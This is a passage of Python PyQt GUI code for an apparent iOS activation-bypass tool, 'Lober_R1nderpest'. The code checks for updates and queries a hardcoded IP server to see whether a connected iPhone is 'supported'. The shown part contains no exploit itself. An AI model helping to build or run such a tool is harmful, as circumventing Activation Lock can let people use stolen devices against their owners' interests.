                                      background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(7, 144, 0, 255), stop:1 rgba(137, 255, 101, 255));
                                      color: rgb(255, 255, 255);
                                      border-radius: 20px;    
                                      """)
                                else:
                                      self.activationState.setText(f"Activation state: No")
                                self.iOSVersion.setText(f"iOS Version: {ProductVersion}")
                        except:
                                self.listWidget.addItem("[*] Could not get device info!")
                                self.introStatusLabel.setText("Could not get device info!")
                                time.sleep(2)
                                sys.exit()
                        time.sleep(0.5)
                        self.introStatusLabel.setText("Checking for updates...")
                        self.listWidget.addItem("[*] Checking for updates...")
                        time.sleep(1)
                        try:
                                r = requests.get(url="https://r1nderpest-default-rtdb.firebaseio.com/.json")
                                serverVERSION = r.json()["version"]
                                if serverVERSION > version:
                                        print(f"[*] Update available! [v{version} ==> v{serverVERSION}]")

                                        self.listWidget.addItem(f"[*] Update available! [v{version} ==> v{serverVERSION}]")
                                        
                                        self.HomePage.show()
                                        self.Intro.hide()
                                        self.ShowInfoPopup(title="Update Available!", message=f"The new version of R1nderPest {serverVERSION} is available!", button_text="Okay")
                                else:
                                        self.HomePage.show()
                                        self.Intro.hide()
                                        
                                        print("[*] No updates found!")
                                        self.listWidget.addItem("[*] No updates found!")
                        except Exception as e:
                                self.HomePage.show()
                                self.Intro.hide()
                                print(f"[*] Error checking for updates! {e}")
                                self.ShowInfoPopup(button_text="Close", message="Error checking for updates!", title="Warning")
                                self.listWidget.addItem("[*] Error checking for updates!")
                        self.listWidget.addItem("#### WARNING! ####")
                        self.listWidget.addItem("Before activating, make sure that the device is connected to the SAME WI-FI NETWORK as the computer. Also make sure that you have disabled DNS, Proxy, VPN, etc.")
                        self.Intro.hide()
                        self.HomePage.show()
                        self.api_url = "http://194.99.21.156:8001//get2.php"
                        self.ShowLoadingPopup(message="Checking compatibility...")
                        time.sleep(0.5)
                        self.HideLoadingPopup()
                        time.sleep(0.2)
                        
                        r = requests.get(url=f"{self.api_url}?prd={ProductType}&guid=GUID&sn=SN&ver={self.iOS}")
                        if "'success': True" in str(r.json()):
                            self.deviceInfo.setText(f"iOS Version: {ProductVersion}, Supported")
                            self._apply_status_asset(True)
                            self.capabilityTitle.setText("Supported")
                            self.capabilitySubtitle.setText("Your device is supported! (Local compatibility rule)")
                            self.ShowInfoPopup(button_text="Close", message="Your device is supported!", title="Status")
                        else:
                            self.deviceInfo.setText(f"iOS Version: {ProductVersion}, Unsupported")
                            self._apply_status_asset(False)
                            self.capabilityTitle.setText("Unsupported")
                            self.capabilitySubtitle.setText("Your device is not supported by this version of iOS.")
                            self.activateButton.setEnabled(False)
                            self.activateButton.setText("Unsupported.")
                            self.ShowInfoPopup(button_text="Close", message="Your device is unsupported!", title="Status")
                        break




    def retranslateUi(self, MainWindow):
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "Lober_R1nderpest"))
        self.welcomeTitle.setText(_translate("MainWindow", "Welcome"))
        self.welcomeMessage.setText(_translate("MainWindow", "Connect an iPhone or iPad to continue. The device status and compatibility check will appear here."))
        self.introStatusLabel.setText(_translate("MainWindow", "Searching for devices..."))
        self.devicesCaption.setText(_translate("MainWindow", "Devices"))
        self.headerTitle.setText(_translate("MainWindow", "Lober_R1nderpest"))
        self.themeHint.setText(_translate("MainWindow", "Dark"))
        self.settingsButton.setText(_translate("MainWindow", "Settings"))
        self.themeButton.setText(_translate("MainWindow", "☀  Light"))
        self.iosBadge.setText(_translate("MainWindow", "iOS"))
        self.iosVersionLarge.setText(_translate("MainWindow", "iOS 26.6.2"))
        self.buildNumber.setText(_translate("MainWindow", "Build number: 23C90"))
        self.deviceSectionLabel.setText(_translate("MainWindow", "Device"))
        self.deviceName.setText(_translate("MainWindow", "iPhone 16 Pro"))
        self.deviceUDID.setText(_translate("MainWindow", "UDID: A19335BC-3136-4076-871F-D1D38E22FA60"))
        self.activationState.setText(_translate("MainWindow", "Activation state: No"))
        self.capabilityIcon.setText(_translate("MainWindow", "×"))
        self.capabilityTitle.setText(_translate("MainWindow", "Unsupported"))
        self.capabilitySubtitle.setText(_translate("MainWindow", "Your device is not supported by this version of iOS."))
        self.activateButton.setText(_translate("MainWindow", "Activate"))
        self.messageTitle.setText(_translate("MainWindow", "Status"))
        self.messageContent.setText(_translate("MainWindow", ""))
        self.closePopup.setText(_translate("MainWindow", "Close"))
        self.loadingText.setText(_translate("MainWindow", "Checking…"))
        self.activationDeviceTitle.setText(_translate("MainWindow", "Activating “Device”"))
        self.activationStep.setText(_translate("MainWindow", "Preparing…"))
        self.detailsToggle.setText(_translate("MainWindow", ">  Show Details"))
        self.activationDone.setText(_translate("MainWindow", "Done"))
        self.settingsTitle.setText(_translate("MainWindow", "Settings"))
        self.apiUrlHint.setText(_translate("MainWindow", "Provides API URL address to the application."))
        self.settingsCancel.setText(_translate("MainWindow", "Cancel"))
        self.settingsSave.setText(_translate("MainWindow", "Save"))



if __name__ == "__main__":
    import sys
    QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)
    QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
